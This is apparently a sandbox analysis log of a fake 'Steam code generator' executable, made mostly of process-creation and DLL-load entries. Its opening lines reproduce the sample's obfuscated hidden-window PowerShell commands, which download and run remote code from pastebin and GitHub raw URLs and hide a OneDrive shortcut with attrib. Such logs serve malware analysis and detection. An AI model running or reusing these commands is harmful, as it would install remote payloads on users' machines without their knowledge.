Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\steamcodegenerator.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
